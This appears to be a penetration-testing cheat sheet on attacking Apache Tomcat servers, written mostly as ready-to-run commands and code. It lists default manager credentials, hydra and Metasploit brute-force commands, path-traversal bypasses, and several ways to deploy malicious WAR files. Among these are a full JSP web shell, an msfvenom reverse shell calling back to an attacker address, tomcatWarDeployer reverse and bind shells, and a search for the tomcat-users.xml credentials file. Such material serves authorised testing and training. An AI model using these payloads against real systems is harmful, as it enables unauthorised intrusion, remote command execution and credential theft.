Links

Tomcat

Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. Try it for free today.

Discovery

  • It usually runs on port 8080
  • Common Tomcat error:

Enumeration

Version

curl -s http://tomcat-site.local:8080/docs/ | grep Tomcat
<html lang="en"><head><META http-equiv="Content-Type" content="text/html; charset=UTF-8"><link href="./images/docs-stylesheet.css" rel="stylesheet" type="text/css"><title>Apache Tomcat 9 (9.0.30) - Documentation Index</title><meta name="author"

Locate manager files

It's interesting to find where are the pages /manager and /host-manager as they might have a different name. You can search them with a brute-force.

Username Enum

In some versions prior to Tomcat6 you could enumerate users:
msf> use auxiliary/scanner/http/tomcat_enum

Default credentials

The most interesting path of Tomcat is /manager/html, inside that path you can upload and deploy war files (execute code). But this path is protected by basic HTTP auth, the most common credentials are:
  • admin:admin
  • tomcat:tomcat
  • admin:<NOTHING>
  • admin:s3cr3t
  • tomcat:s3cr3t
  • admin:tomcat
You could test these and more using:
msf> use auxiliary/scanner/http/tomcat_mgr_login
Another interesting Tomcat path is /manager/status, where you can see the version of the OS and Tomcat. This is useful to find vulns affecting the version of Tomcat when you cannot access /manager/html.

Bruteforce

hydra -L users.txt -P /usr/share/seclists/Passwords/darkweb2017-top1000.txt -f 10.10.10.64 http-get /manager/html
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set VHOST tomacat-site.internal
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set RPORT 8180
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set stop_on_success true
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set rhosts <IP>

Vulns

Password backtrace disclosure

Try to access /auth.jsp and if you are very lucky it might disclose the password in a backtrace.

Double URL encode

A well-known vulnerability to access the application manager __ is mod_jk in CVE-2007-1860, that allows Double URL encode path traversal.
In order to access to the management web of the Tomcat go to: pathTomcat/%252E%252E/manager/html
Take into account that to upload the webshell you might need to use the double urlencode trick and send also a cookie and/or a SSRF token. To access to backdoor you might also need to use the double urlencode trick.

/examples

The following example scripts that come with Apache Tomcat v4.x - v7.x and can be used by attackers to gain information about the system. These scripts are also known to be vulnerable to cross site scripting (XSS) injection (from here).
  • /examples/jsp/num/numguess.jsp
  • /examples/jsp/dates/date.jsp
  • /examples/jsp/snp/snoop.jsp
  • /examples/jsp/error/error.html
  • /examples/jsp/sessions/carts.html
  • /examples/jsp/checkbox/check.html
  • /examples/jsp/colors/colors.html
  • /examples/jsp/cal/login.html
  • /examples/jsp/include/include.jsp
  • /examples/jsp/forward/forward.jsp
  • /examples/jsp/plugin/plugin.jsp
  • /examples/jsp/jsptoserv/jsptoservlet.jsp
  • /examples/jsp/simpletag/foo.jsp
  • /examples/jsp/mail/sendmail.jsp
  • /examples/servlet/HelloWorldExample
  • /examples/servlet/RequestInfoExample
  • /examples/servlet/RequestHeaderExample
  • /examples/servlet/RequestParamExample
  • /examples/servlet/CookieExample
  • /examples/servlet/JndiServlet
  • /examples/servlet/SessionExample
  • /tomcat-docs/appdev/sample/web/hello.jsp

Path Traversal (..;/)

In some vulnerable configurations of Tomcat you can gain access to protected directories in Tomcat using the path: /..;/
So, for example, you might be able to access the Tomcat manager page by accessing: www.vulnerable.com/lalala/..;/manager/html
Another way to bypass protected paths using this trick is to access http://www.vulnerable.com/;param=value/manager/html

RCE

Finally, if you have access to the Tomcat Web Application Manager, you can upload and deploy a .war file (execute code).

Limitations

You will only be able to deploy a WAR if you have enough privileges (roles: admin, manager and manager-script). Those details can be find under tomcat-users.xml usually defined in /usr/share/tomcat9/etc/tomcat-users.xml (it vary between versions) (see POST section).
# tomcat6-admin (debian) or tomcat6-admin-webapps (rhel) has to be installed
# deploy under "path" context path
curl --upload-file monshell.war -u 'tomcat:password' "http://localhost:8080/manager/text/deploy?path=/monshell"
# undeploy
curl "http://tomcat:Password@localhost:8080/manager/text/undeploy?path=/monshell"

Metasploit

use exploit/multi/http/tomcat_mgr_upload
msf exploit(multi/http/tomcat_mgr_upload) > set rhost <IP>
msf exploit(multi/http/tomcat_mgr_upload) > set rport <port>
msf exploit(multi/http/tomcat_mgr_upload) > set httpusername <username>
msf exploit(multi/http/tomcat_mgr_upload) > set httppassword <password>
msf exploit(multi/http/tomcat_mgr_upload) > exploit

MSFVenom Reverse Shell

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.11.0.41 LPORT=80 -f war -o revshell.war
Then, upload the revshell.war file and access to it (/revshell/)

Bind and reverse shell with tomcatWarDeployer.py

In some scenarios this doesn't work (for example old versions of sun)

Download

git clone https://github.com/mgeeky/tomcatWarDeployer.git

Reverse shell

./tomcatWarDeployer.py -U <username> -P <password> -H <ATTACKER_IP> -p <ATTACKER_PORT> <VICTIM_IP>:<VICTIM_PORT>/manager/html/

Bind shell

./tomcatWarDeployer.py -U <username> -P <password> -p <bind_port> <victim_IP>:<victim_PORT>/manager/html/

Using Culsterd

clusterd.py -i 192.168.1.105 -a tomcat -v 5.5 --gen-payload 192.168.1.6:4444 --deploy shell.war --invoke --rand-payload -o windows

Manual method - Web shell

Create index.jsp with this content:
<FORM METHOD=GET ACTION='index.jsp'>
<INPUT name='cmd' type=text>
<INPUT type=submit value='Run'>
</FORM>
<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
String output = "";
if(cmd != null) {
String s = null;
try {
Process p = Runtime.getRuntime().exec(cmd,null,null);
BufferedReader sI = new BufferedReader(new
InputStreamReader(p.getInputStream()));
while((s = sI.readLine()) != null) { output += s+"</br>"; }
} catch(IOException e) { e.printStackTrace(); }
}
%>
<pre><%=output %></pre>
mkdir webshell
cp index.jsp webshell
cd webshell
jar -cvf ../webshell.war *
webshell.war is created
# Upload it
You could also install this (allows upload, download and command execution): http://vonloesch.de/filebrowser.html

Manual Method 2

Get a JSP web shell such as this and create a WAR file:
wget https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp
zip -r backup.war cmd.jsp
# When this file is uploaded to the manager GUI, the /backup application will be added to the table.
# Go to: http://tomcat-site.local:8180/backup/cmd.jsp

POST

Name of Tomcat credentials file is tomcat-users.xml
find / -name tomcat-users.xml 2>/dev/null
Other ways to gather Tomcat credentials:
msf> use post/multi/gather/tomcat_gather
msf> use post/windows/gather/enum_tomcat

Other tomcat scanning tools

Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. Try it for free today.